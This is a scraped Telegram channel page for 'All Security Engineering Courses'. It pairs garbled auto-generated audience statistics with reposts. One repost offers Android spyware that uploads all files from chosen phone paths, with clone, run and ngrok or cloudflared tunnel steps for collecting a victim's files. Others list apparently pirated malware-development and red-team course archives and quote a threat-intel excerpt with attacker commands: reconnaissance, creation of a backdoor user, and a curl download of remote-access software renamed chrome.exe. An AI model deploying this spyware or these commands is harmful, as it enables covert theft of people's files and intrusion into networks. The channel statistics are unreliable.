en
Feedback
All Security Engineering Courses

All Security Engineering Courses

Open in Telegram

This channel is being updated often with older than 2020 courses, ebooks, videos, code, etc. to be used responsibly by everyone in CyberSecurity in an ethical manner. Lots of content is being downloaded from other channels or forwarded here. Bookmark me!

Show more

📈 Analytical overview of Telegram channel All Security Engineering Courses

Channel All Security Engineering Courses (@allsecurityengineeringcourses) in the English language segment is an active participant. Currently, the community unites 19 216 subscribers, ranking 6 651 in the Technologies & Applications category and 34 061 in the Russia region.

📊 Audience metrics and dynamics

Since its creation on невідомо, the project has demonstrated rapid growth, gathering an audience of 19 216 subscribers.

According to the latest data from 19 September, 2026, the channel demonstrates stable activity. Although there has been a change in the number of participants by 99 over the last 30 days and by 0 over the last 24 hours, overall reach remains high.

  • Verification status: Not verified
  • Engagement rate (ER): The average audience engagement rate is 16.35%. Within the first 24 hours after publication, content typically collects N/A% reactions from the total number of subscribers.
  • Post reach: On average, each post receives 0 views. Within the first day, a publication typically gains 0 views.
  • Reactions and interaction: The audience actively supports content: the average number of reactions per post is 0.
  • Thematic interests: Content is focused on key topics such as git, strace, github, linux, docker.

📝 Description and content policy

The author describes the resource as a platform for expressing subjective opinions:
This channel is being updated often with older than 2020 courses, ebooks, videos, code, etc. to be used responsibly by everyone in CyberSecurity in an ethical manner. Lots of content is being downloaded from other channels or forwarded here. Bookmar...

Thanks to the high frequency of updates (latest data received on 20 September, 2026), the channel maintains relevance and a high level of publication reach. Analytics show that the audience actively interacts with content, making it an important point of influence in the Technologies & Applications category.

19 216
Subscribers
No data24 hours
+287 days
+9930 days
Posts Archive
@WickHelps-ntroduction Windows Malware Development.rar1282.35 MB

Repost from N/a
Simple Android spyware that uploads all files from user selected paths. pkg update && pkg upgrade -y pkg install git pv unzip
Simple Android spyware that uploads all files from user selected paths.
pkg update && pkg upgrade -y
pkg install git pv unzip -y
git clone http://github.com/7wp81x/Spim3
cd Spim3/
bash spim3.sh

Example usage:

- open new session
cd Files/
php -S 127.0.0.1:8000 > /dev/null 2>&1 &

- Tunnel using cloudflared
cloudflared tunnel --url 127.0.0.1:8080

- Tunnel using ngrok
ngrok http 8080

- on main session:

bash spim3.sh

- Enter the url from ngrok/cloudflare.
- Enter paths, if done then Enter done.
- Compile /sdcard/Spim3/decompiled Using apktool_M
Termux tools are for educational use only. For more information about this tool, visit the GitHub link.

Repost from N/a
Antisyphon: Offensive Development w/ Greg Hatcher & John Stigerwalt
Antisyphon: Offensive Development w/ Greg Hatcher & John Stigerwalt

HackTricks - AWS Red Team Expert (ARTE).part01.rar1996.80 MB

Offensive Development w Greg Hatcher & John Stigerwalt.rar3250.61 MB

https://xakep.ru/2011/12/06/57950/ SQLMap - SQL Injections are easy

https://trivy.dev/v0.17.2/ A Simple and Comprehensive Vulnerability Scanner for Containers and other Artifacts, Suitable for CI.

US companies letting go of US employees!
US companies letting go of US employees!

So that was a lie
So that was a lie

This repo contains information about EDRs that can be useful during red team exercise. https://github.com/Mr-Un1k0d3r/EDRs/ #статьи_ссылки_scripts

After establishing an initial connection, SCATTERED SPIDER executed the ping command against several domains within and outside of the target organization, likely to identify their level of access and visibility within the network. The adversary then ran several variations of the nltest command to identify domain controllers (DCs) of interest and the wmic command to identify programs currently installed on the host. Finally, the adversary established persistence by creating a new user on the host and attempting to download FleetDeck remote access software. nltest /dclist:<domain> nltest /domain_trusts wmic product get name, version net user [Redacted-Username] [Redacted-Password] curl -L hxxps://agent.fleetdeck[.]io/M9zydGyGHrUXkhZeB9mj4?win -o chrome.exe